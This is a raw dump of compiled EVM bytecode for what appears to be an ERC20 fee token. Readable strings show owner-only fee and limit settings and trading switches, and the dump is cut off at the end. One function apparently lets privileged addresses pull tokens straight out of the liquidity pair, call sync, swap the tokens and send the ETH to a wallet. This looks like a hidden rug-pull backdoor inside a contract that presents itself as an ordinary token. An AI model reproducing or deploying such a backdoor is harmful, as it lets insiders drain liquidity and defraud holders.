0000000008152600401611a149061447e565b60405180910390fd5b611a27828261333a565b5050565b60135481565b601a5481565b6000601b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16611a8f57600080fd5b6000611abc600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16611208565b9050600183118015611ad95750606481611ad6919061423d565b83105b611b18576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b0f906144ea565b60405180910390fd5b611b21836133db565b611b2a846134ab565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051611b729061453b565b60006040518083038185875af1925050503d8060008114611baf576040519150601f19603f3d011682016040523d82523d6000602084013e611bb4565b606091505b50509050809250505092915050565b60175481565b6000611c8c611bd66126cf565b84611c87856040518060600160405280602581526020016151eb6025913960016000611c006126cf565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6126d7565b6001905092915050565b6000611caa611ca36126cf565b84846128a0565b6001905092915050565b611cbc6126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611d4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d42906141bf565b60405180910390fd5b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567460405160405180910390a380600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b601d6020528060005260406000206000915054906101000a900460ff1681565b600d60019054906101000a900460ff1681565b611e466126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614611ed5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ecc906141bf565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611f729190613e07565b60405180910390a25050565b611f866126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612015576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161200c906141bf565b60405180910390fd5b82601581905550816016819055508060178190555060175460165460155461203d9190614300565b6120479190614300565b60148190555060196014541115612093576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208a9061459c565b60405180910390fd5b505050565b6120a06126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461212f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612126906141bf565b60405180910390fd5b670de0b6b3a76400006103e86005612145610da3565b61214f91906145bc565b612159919061423d565b612163919061423d565b8110156121a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219c90614688565b60405180910390fd5b670de0b6b3a7640000816121b991906145bc565b600c8190555050565b600f60009054906101000a900460ff1681565b600a5481565b60006121e56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b906141bf565b60405180910390fd5b620186a06001612282610da3565b61228c91906145bc565b612296919061423d565b8210156122d8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122cf9061471a565b60405180910390fd5b6103e860056122e5610da3565b6122ef91906145bc565b6122f9919061423d565b82111561233b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612332906147ac565b60405180910390fd5b81600b8190555060019050919050565b60105481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b60006123e86126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612477576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246e906141bf565b60405180910390fd5b6000600f60006101000a81548160ff0219169083151502179055506001905090565b60125481565b6124a76126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612536576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161252d906141bf565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161259c9061483e565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60165481565b600c5481565b60008082846126809190614300565b9050838110156126c5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126bc906148aa565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612746576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273d9061493c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036127b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127ac906149ce565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516128939190613ed8565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361290f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161290690614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361297e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161297590614af2565b60405180910390fd5b6000810361299757612992838360006136ee565b6132b4565b600d60009054906101000a900460ff1615612d8b576129b461180e565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612a2257506129f261180e565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a5b5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612a95575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612aae5750600760149054906101000a900460ff16155b15612d8a57600d60019054906101000a900460ff16612ba857601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612b685750601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612ba7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b9e90614b5e565b60405180910390fd5b5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612c4b5750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612c9a57600a54811115612c95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c8c90614bf0565b60405180910390fd5b612d89565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612d3d5750601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612d8857600a54811115612d87576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d7e90614c82565b60405180910390fd5b5b5b5b5b6000612d9630611208565b90506000600b548210159050808015612dbb5750600d60029054906101000a900460ff165b8015612dd45750600760149054906101000a900460ff16155b8015612e2a5750601d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612e805750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015612ed65750601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15612f1a576001600760146101000a81548160ff021916908315150217905550612efe613981565b6000600760146101000a81548160ff0219169083151502179055505b6000600760149054906101000a900460ff16159050601b60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612fd05750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15612fda57600090505b600081156132a457601d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561303d57506000601454115b1561315b5761306a606461305c60145488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b90506014546016548261307d91906145bc565b613087919061423d565b601960008282546130989190614300565b92505081905550601454601754826130b091906145bc565b6130ba919061423d565b601a60008282546130cb9190614300565b92505081905550601454601554826130e391906145bc565b6130ed919061423d565b601860008282546130fe9190614300565b9250508190555060006002600a546131169190614ca2565b14613156576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161314d90614d45565b60405180910390fd5b613280565b601d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156131b657506000601054115b1561327f576131e360646131d560105488613aeb90919063ffffffff16565b613b6590919063ffffffff16565b9050601054601254826131f691906145bc565b613200919061423d565b601960008282546132119190614300565b925050819055506010546013548261322991906145bc565b613233919061423d565b601a60008282546132449190614300565b925050819055506010546011548261325c91906145bc565b613266919061423d565b601860008282546132779190614300565b925050819055505b5b6000811115613295576132948730836136ee565b5b80856132a19190614d65565b94505b6132af8787876136ee565b505050505b505050565b6000838311158290613301576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016132f89190613cf1565b60405180910390fd5b50600083856133109190614d65565b9050809150509392505050565b6001600d60016101000a81548160ff021916908315150217905550565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b613426600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff163061340a6110a4565b600a6134169190614ecc565b8461342191906145bc565b6128a0565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b15801561349057600080fd5b505af11580156134a4573d6000803e3d6000fd5b5050505050565b6000600267ffffffffffffffff8111156134c8576134c7614f17565b5b6040519080825280602002602001820160405280156134f65781602001602082028036833780820191505090505b509050308160008151811061350e5761350d614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156135b5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906135d99190614f8a565b816001815181106135ed576135ec614f46565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505061365430600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846126d7565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016136b89594939291906150b0565b600060405180830381600087803b1580156136d257600080fd5b505af11580156136e6573d6000803e3d6000fd5b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361375d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161375490614a60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036137cc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016137c390614af2565b60405180910390fd5b6137d7838383613baf565b6138428160405180606001604052806026815260200161519d602691396000808773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546132b99092919063ffffffff16565b6000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506138d5816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461267190919063ffffffff16565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516139749190613ed8565b60405180910390a3505050565b600061398c30611208565b90506000601a546018546019546139a39190614300565b6139ad9190614300565b90506000808314806139bf5750600082145b156139cc57505050613ae9565b6014600b546139db91906145bc565b8311156139f4576014600b546139f191906145bc565b92505b600060028360195486613a0791906145bc565b613a11919061423d565b613a1b919061423d565b90506000613a328286613bb490919063ffffffff16565b9050613a3d816134ab565b600060198190555060006018819055506000601a81905550600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051613a9b9061453b565b60006040518083038185875af1925050503d8060008114613ad8576040519150601f19603f3d011682016040523d82523d6000602084013e613add565b606091505b50508093505050505050505b565b6000808303613afd5760009050613b5f565b60008284613b0b91906145bc565b9050828482613b1a919061423d565b14613b5a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613b519061517c565b60405180910390fd5b809150505b92915050565b6000613ba783836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250613bfe565b905092915050565b505050565b6000613bf683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506132b9565b905092915050565b60008083118290613c45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613c3c9190613cf1565b60405180910390fd5b5060008385613c54919061423d565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015613c9b578082015181840152602081019050613c80565b60008484015250505050565b6000601f19601f8301169050919050565b6000613cc382613c61565b613ccd8185613c6c565b9350613cdd818560208601613c7d565b613ce681613ca7565b840191505092915050565b60006020820190508181036000830152613d0b8184613cb8565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000613d4382613d18565b9050919050565b613d5381613d38565b8114613d5e57600080fd5b50565b600081359050613d7081613d4a565b92915050565b6000819050919050565b613d8981613d76565b8114613d9457600080fd5b50565b600081359050613da681613d80565b92915050565b60008060408385031215613dc357613dc2613d13565b5b6000613dd185828601613d61565b9250506020613de285828601613d97565b9150509250929050565b60008115159050919050565b613e0181613dec565b82525050565b6000602082019050613e1c6000830184613df8565b92915050565b600060208284031215613e3857613e37613d13565b5b6000613e4684828501613d61565b91505092915050565b6000819050919050565b6000613e74613e6f613e6a84613d18565b613e4f565b613d18565b9050919050565b6000613e8682613e59565b9050919050565b6000613e9882613e7b565b9050919050565b613ea881613e8d565b82525050565b6000602082019050613ec36000830184613e9f565b92915050565b613ed281613d76565b82525050565b6000602082019050613eed6000830184613ec9565b92915050565b600060208284031215613f0957613f08613d13565b5b6000613f1784828501613d97565b91505092915050565b600080600060608486031215613f3957613f38613d13565b5b6000613f4786828701613d61565b9350506020613f5886828701613d61565b9250506040613f6986828701613d97565b9150509250925092565b600060ff82169050919050565b613f8981613f73565b82525050565b6000602082019050613fa46000830184613f80565b92915050565b613fb381613d38565b82525050565b6000602082019050613fce6000830184613faa565b92915050565b613fdd81613dec565b8114613fe857600080fd5b50565b600081359050613ffa81613fd4565b92915050565b6000806040838503121561401757614016613d13565b5b600061402585828601613d61565b925050602061403685828601613feb565b9150509250929050565b60008060006060848603121561405957614058613d13565b5b600061406786828701613d97565b935050602061407886828701613d97565b925050604061408986828701613d97565b9150509250925092565b600080604083850312156140aa576140a9613d13565b5b60006140b885828601613d97565b92505060206140c985828601613d97565b9150509250929050565b600080604083850312156140ea576140e9613d13565b5b60006140f885828601613d61565b925050602061410985828601613d61565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061415a57607f821691505b60208210810361416d5761416c614113565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006141a9602083613c6c565b91506141b482614173565b602082019050919050565b600060208201905081810360008301526141d88161419c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061424882613d76565b915061425383613d76565b925082614263576142626141df565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b60006142ca602f83613c6c565b91506142d58261426e565b604082019050919050565b600060208201905081810360008301526142f9816142bd565b9050919050565b600061430b82613d76565b915061431683613d76565b925082820190508082111561432e5761432d61420e565b5b92915050565b7f4d757374206b656570206665657320617420323025206f72206c657373000000600082015250565b600061436a601d83613c6c565b915061437582614334565b602082019050919050565b600060208201905081810360008301526143998161435d565b9050919050565b7f646f6e6500000000000000000000000000000000000000000000000000000000600082015250565b60006143d6600483613c6c565b91506143e1826143a0565b602082019050919050565b60006020820190508181036000830152614405816143c9565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b6000614468603983613c6c565b91506144738261440c565b604082019050919050565b600060208201905081810360008301526144978161445b565b9050919050565b7f616d6f756e742065786365656465640000000000000000000000000000000000600082015250565b60006144d4600f83613c6c565b91506144df8261449e565b602082019050919050565b60006020820190508181036000830152614503816144c7565b9050919050565b600081905092915050565b50565b600061452560008361450a565b915061453082614515565b600082019050919050565b600061454682614518565b9150819050919050565b7f4d757374206b656570206665657320617420323525206f72206c657373000000600082015250565b6000614586601d83613c6c565b915061459182614550565b602082019050919050565b600060208201905081810360008301526145b581614579565b9050919050565b60006145c782613d76565b91506145d283613d76565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561460b5761460a61420e565b5b828202905092915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b6000614672602483613c6c565b915061467d82614616565b604082019050919050565b600060208201905081810360008301526146a181614665565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e3030312520746f74616c20737570706c792e0000000000000000000000602082015250565b6000614704603583613c6c565b915061470f826146a8565b604082019050919050565b60006020820190508181036000830152614733816146f7565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206869676865722074686160008201527f6e20302e352520746f74616c20737570706c792e000000000000000000000000602082015250565b6000614796603483613c6c565b91506147a18261473a565b604082019050919050565b600060208201905081810360008301526147c581614789565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000614828602683613c6c565b9150614833826147cc565b604082019050919050565b600060208201905081810360008301526148578161481b565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000614894601b83613c6c565b915061489f8261485e565b602082019050919050565b600060208201905081810360008301526148c381614887565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000614926602483613c6c565b9150614931826148ca565b604082019050919050565b6000602082019050818103600083015261495581614919565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006149b8602283613c6c565b91506149c38261495c565b604082019050919050565b600060208201905081810360008301526149e7816149ab565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000614a4a602583613c6c565b9150614a55826149ee565b604082019050919050565b60006020820190508181036000830152614a7981614a3d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000614adc602383613c6c565b9150614ae782614a80565b604082019050919050565b60006020820190508181036000830152614b0b81614acf565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b6000614b48601683613c6c565b9150614b5382614b12565b602082019050919050565b60006020820190508181036000830152614b7781614b3b565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000614bda603583613c6c565b9150614be582614b7e565b604082019050919050565b60006020820190508181036000830152614c0981614bcd565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b6000614c6c603683613c6c565b9150614c7782614c10565b604082019050919050565b60006020820190508181036000830152614c9b81614c5f565b9050919050565b6000614cad82613d76565b9150614cb883613d76565b925082614cc857614cc76141df565b5b828206905092915050565b7f4552524f523a204d757374206265206c657373207468616e206d61785478416d60008201527f6f756e7400000000000000000000000000000000000000000000000000000000602082015250565b6000614d2f602483613c6c565b9150614d3a82614cd3565b604082019050919050565b60006020820190508181036000830152614d5e81614d22565b9050919050565b6000614d7082613d76565b9150614d7b83613d76565b9250828203905081811115614d9357614d9261420e565b5b92915050565b60008160011c9050919050565b6000808291508390505b6001851115614df057808604811115614dcc57614dcb61420e565b5b6001851615614ddb5780820291505b8081029050614de985614d99565b9450614db0565b94509492505050565b600082614e095760019050614ec5565b81614e175760009050614ec5565b8160018114614e2d5760028114614e3757614e66565b6001915050614ec5565b60ff841115614e4957614e4861420e565b5b8360020a915084821115614e6057614e5f61420e565b5b50614ec5565b5060208310610133831016604e8410600b8410161715614e9b5782820a905083811115614e9657614e9561420e565b5b614ec5565b614ea88484846001614da6565b92509050818404811115614ebf57614ebe61420e565b5b81810290505b9392505050565b6000614ed782613d76565b9150614ee283613f73565b9250614f0f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484614df9565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050614f8481613d4a565b92915050565b600060208284031215614fa057614f9f613d13565b5b6000614fae84828501614f75565b91505092915050565b6000819050919050565b6000614fdc614fd7614fd284614fb7565b613e4f565b613d76565b9050919050565b614fec81614fc1565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61502781613d38565b82525050565b6000615039838361501e565b60208301905092915050565b6000602082019050919050565b600061505d82614ff2565b6150678185614ffd565b93506150728361500e565b8060005b838110156150a357815161508a888261502d565b975061509583615045565b925050600181019050615076565b5085935050505092915050565b600060a0820190506150c56000830188613ec9565b6150d26020830187614fe3565b81810360408301526150e48186615052565b90506150f36060830185613faa565b6151006080830184613ec9565b9695505050505050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b6000615166602183613c6c565b91506151718261510a565b604082019050919050565b6000602082019050818103600083015261519581615159565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220b0af349a61ba52d71fd59d3245d356fa9df1c918782d4ab782242e1850d5b12364736f6c63430008100033
Deployed Bytecode
0x60806040526004361061031e5760003560e01c80638ea5220f116101ab578063c0246668116100f7578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d314610c03578063f2fde38b14610c2e578063f637434214610c57578063f8b45b0514610c8257610325565b8063dd62ed3e14610b70578063e2f4560514610bad578063e884f26014610bd857610325565b8063c876d0b9116100d1578063c876d0b914610ab2578063c8c8ebe414610add578063d257b34f14610b08578063d85ba06314610b4557610325565b8063c024666814610a37578063c17b5b8c14610a60578063c18bc19514610a8957610325565b8063a06c1f8f11610164578063a9059cbb1161013e578063a9059cbb14610969578063aacebbe3146109a6578063b62496f5146109cf578063bbc0c74214610a0c57610325565b8063a06c1f8f146108c4578063a0d82dc514610901578063a457c2d71461092c57610325565b80638ea5220f146107c457806392136913146107ef57806395d89b411461081a5780639a7a23d6146108455780639c3b4fdc1461086e5780639fccce321461089957610325565b80634a62bb651161026a578063751039fc116102235780637bce5a04116101fd5780637bce5a041461072e5780638095d564146107595780638a8c523c146107825780638da5cb5b1461079957610325565b8063751039fc146106af5780637571336a146106da57806375f0a8741461070357610325565b80634a62bb651461059d5780634fbee193146105c85780636a486a8e146106055780636ddd17131461063057806370a082311461065b578063715018a61461069857610325565b80631a8145bb116102d757806323b872dd116102b157806323b872dd146104cd578063313ce5671461050a578063395093511461053557806349bd5a5e1461057257610325565b80631a8145bb1461044e5780631f3fed8f14610479578063203e727e146104a457610325565b806306fdde031461032a578063095ea7b31461035557806310d5de53146103925780631694505e146103cf57806318160ddd146103fa5780631816467f1461042557610325565b3661032557005b600080fd5b34801561033657600080fd5b5061033f610cad565b60405161034c9190613cf1565b60405180910390f35b34801561036157600080fd5b5061037c60048036038101906103779190613dac565b610d3f565b6040516103899190613e07565b60405180910390f35b34801561039e57600080fd5b506103b960048036038101906103b49190613e22565b610d5d565b6040516103c69190613e07565b60405180910390f35b3480156103db57600080fd5b506103e4610d7d565b6040516103f19190613eae565b60405180910390f35b34801561040657600080fd5b5061040f610da3565b60405161041c9190613ed8565b60405180910390f35b34801561043157600080fd5b5061044c60048036038101906104479190613e22565b610dad565b005b34801561045a57600080fd5b50610463610f04565b6040516104709190613ed8565b60405180910390f35b34801561048557600080fd5b5061048e610f0a565b60405161049b9190613ed8565b60405180910390f35b3480156104b057600080fd5b506104cb60048036038101906104c69190613ef3565b610f10565b005b3480156104d957600080fd5b506104f460048036038101906104ef9190613f20565b610fcb565b6040516105019190613e07565b60405180910390f35b34801561051657600080fd5b5061051f6110a4565b60405161052c9190613f8f565b60405180910390f35b34801561054157600080fd5b5061055c60048036038101906105579190613dac565b6110ad565b6040516105699190613e07565b60405180910390f35b34801561057e57600080fd5b50610587611160565b6040516105949190613fb9565b60405180910390f35b3480156105a957600080fd5b506105b2611186565b6040516105bf9190613e07565b60405180910390f35b3480156105d457600080fd5b506105ef60048036038101906105ea9190613e22565b611199565b6040516105fc9190613e07565b60405180910390f35b34801561061157600080fd5b5061061a6111ef565b6040516106279190613ed8565b60405180910390f35b34801561063c57600080fd5b506106456111f5565b6040516106529190613e07565b60405180910390f35b34801561066757600080fd5b50610682600480360381019061067d9190613e22565b611208565b60405161068f9190613ed8565b60405180910390f35b3480156106a457600080fd5b506106ad611250565b005b3480156106bb57600080fd5b506106c46113a8565b6040516106d19190613e07565b60405180910390f35b3480156106e657600080fd5b5061070160048036038101906106fc9190614000565b611463565b005b34801561070f57600080fd5b50610718611555565b6040516107259190613fb9565b60405180910390f35b34801561073a57600080fd5b5061074361157b565b6040516107509190613ed8565b60405180910390f35b34801561076557600080fd5b50610780600480360381019061077b9190614040565b611581565b005b34801561078e57600080fd5b5061079761169b565b005b3480156107a557600080fd5b506107ae61180e565b6040516107bb9190613fb9565b60405180910390f35b3480156107d057600080fd5b506107d9611838565b6040516107e69190613fb9565b60405180910390f35b3480156107fb57600080fd5b5061080461185e565b6040516108119190613ed8565b60405180910390f35b34801561082657600080fd5b5061082f611864565b60405161083c9190613cf1565b60405180910390f35b34801561085157600080fd5b5061086c60048036038101906108679190614000565b6118f6565b005b34801561087a57600080fd5b50610883611a2b565b6040516108909190613ed8565b60405180910390f35b3480156108a557600080fd5b506108ae611a31565b6040516108bb9190613ed8565b60405180910390f35b3480156108d057600080fd5b506108eb60048036038101906108e69190614093565b611a